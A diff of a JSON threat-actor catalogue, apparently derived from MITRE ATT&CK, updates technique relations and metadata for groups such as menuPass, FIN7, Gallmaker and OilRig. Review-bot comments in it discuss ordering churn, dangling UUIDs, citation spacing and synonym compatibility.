+ ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3240cbe4-c550-443b-aa76-cc2a7058b870", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bba595da-b73a-4354-aa6c-224d4de7cb4e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9299,6 +11236,27 @@ ], "type": "uses" }, + { + "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "dc5d1a33-62aa-4a0c-aa8c-589b87beb11e", "tags": [ @@ -9306,6 +11264,13 @@ ], "type": "uses" }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "tags": [ 
@@ -9314,7 +11279,70 @@
 "type": "uses"
 },
 {
- "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d",
+ "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2f1a9fd0-3b7c-4d77-a358-78db13adbe78",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
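Review bot: The relations that are actually new for this threat actor — `d54416bd-0803-41ca-870a-ce1af7c05638`, `3c4a2599-71ee-4405-ba1e-0e28414b4bc5`, `bb5a00de-e086-4859-a231-fa793f6797e2` and `da04ac30-27da-4959-a67d-450ce47d9470` — are buried here among entries such as `f4882e23-…`, `b9f5dbe2-…` and `e3a12395-…` that the earlier hunks of this same menuPass object delete, so most of this hunk is the `related` array re-emitted in a different order rather than a change in what the group is linked to; likewise the removed `13cd9151-…` reappears as an addition in an earlier hunk. This file appears to be regenerated from the ATT&CK STIX bundle; if so, the generator should emit `related` in a stable order, e.g. `related.sort(key=lambda r: (r["dest-uuid"], r["type"]))` before serialising, so that a reviewer can audit which technique/software links were really added or dropped for an actor instead of reading through ordering churn. The menuPass object begins and ends outside this hunk.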
@@ -9351,6 +11379,55 @@ ], "type": "uses" }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "96566860-9f11-4b6f-964d-1c924e4f24a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "196f1f32-e0c2-4d46-99cd-234d4b6befe1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", "tags": [ 
@@ -9365,61 +11442,12 @@ ], "type": "uses" }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "196f1f32-e0c2-4d46-99cd-234d4b6befe1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "96566860-9f11-4b6f-964d-1c924e4f24a4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "d1acfbb3-647b-4723-9154-800ec119006e", 
@@ -9433,10 +11461,10 @@ "https://attack.mitre.org/groups/G0046", "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html", "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", - "http://blog.morphisec.com/fin7-attacks-restaurant-industry", - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "http://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" ], "synonyms": [ "FIN7" @@ -9465,7 +11493,7 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9479,7 +11507,7 @@ "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9493,7 +11521,14 @@ "type": "uses" }, { - "dest-uuid": "0ced8926-914e-4c78-bc93-356fb90dbd1f", + "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9506,27 +11541,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -9534,6 +11548,13 @@ ], "type": "uses" }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec", "tags": [ @@ -9549,7 +11570,21 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9570,49 +11605,21 @@ "type": "uses" }, { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "0ced8926-914e-4c78-bc93-356fb90dbd1f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4f6aa78c-c3d4-4883-9840-96ca2f5d6d47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9626,7 +11633,35 @@ "type": "uses" }, { - "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4f6aa78c-c3d4-4883-9840-96ca2f5d6d47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9636,6 +11671,72 @@ "uuid": "3753cc21-2dae-4dfb-8481-d004e74502cc", "value": "FIN7 - G0046" }, + { + "description": "[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)", + "meta": { + "external_id": "G0084", + "refs": [ + "https://attack.mitre.org/groups/G0084", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group" + ], + "synonyms": [ + "Gallmaker" + ] + }, + "related": [ + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "2fd2be6a-d3a2-4a65-b499-05ea2693abee", + "value": "Gallmaker - G0084" + }, { "description": "[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active 
since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)", "meta": { 
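Review bot: The new Gallmaker entry carries seven `dest-uuid` relations whose targets are outside this diff, so nothing here shows that they resolve to existing technique or software entries; a dangling relation would silently drop out of the graph rather than fail on load. Resolving each against the galaxy uuids before merge (or in CI) would close that gap. The entry is otherwise consistent with its neighbours: an `external_id`, two `refs` including the primary Symantec report, and a `synonyms` list that repeats the display name as the existing entries do. The `(Citation: …)` marker inside the description appears to be carried over verbatim from the ATT&CK source and is only resolvable through the `refs` list, which is what consumers will actually use.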
@@ -9668,7 +11769,7 @@ "value": "RTM - G0048" }, { - "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a threat group with suspected Iranian origins that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017) This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a threat group with suspected Iranian origins that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. 
(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.", "meta": { "external_id": "G0049", "refs": [ @@ -9677,13 +11778,15 @@ "http://www.clearskysec.com/oilrig/", "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://pan-unit42.github.io/playbook_viewer/", "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", - "https://pan-unit42.github.io/playbook_viewer/" + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" ], "synonyms": [ "OilRig", - "Helix Kitten", + "IRN2", + "HELIX KITTEN", "APT34" ] }, 
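Review bot: The rewritten OilRig description runs two citation markers together, `(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)`, while every other pair in the sentence is space-separated; inserting the space keeps the text consistent and stops the two markers being read as one token by anything that splits on whitespace. Since this description looks imported from ATT&CK, the correction belongs upstream or in the import step rather than as a hand edit that the next regeneration would undo. The hunk begins on the previous line and the enclosing `meta` object continues past it.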
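Review bot: Replacing the synonym `Helix Kitten` with `HELIX KITTEN` silently breaks any consumer that matched the old spelling case-sensitively (tags, correlation rules or saved searches built on the previous release), since the old string no longer appears anywhere in the entry. Keeping `"Helix Kitten"` alongside `"HELIX KITTEN"` in `synonyms`, or documenting that synonym matching is case-insensitive, would preserve backwards compatibility. It is also not visible from this diff which of the listed refs supports the new `IRN2` alias; the CrowdStrike URL added to `refs` covers the Helix Kitten name, so a one-line pointer for `IRN2` would help the next reader.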
@@ -9717,35 +11820,7 @@ "type": "uses" }, { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9759,56 +11834,7 @@ "type": "uses" }, { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9eec47e-98f4-4b3c-b574-3fa8a87ebe05", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9822,84 +11848,21 @@ "type": "uses" }, { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "dest-uuid": "b9eec47e-98f4-4b3c-b574-3fa8a87ebe05", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "eff1a885-6f90-42a1-901f-eef6e7a1905e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8e101fdd-9f7f-4916-bb04-6bd9e94c129c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0998045d-f96e-4284-95ce-3c8219707486", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + 
"dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9913,49 +11876,7 @@ "type": "uses" }, { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9969,14 +11890,7 @@ "type": "uses" }, { - "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -9990,98 +11904,21 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e6c2a9d-9dc1-4eb0-b27c-91e8076a9d77", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": 
[ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
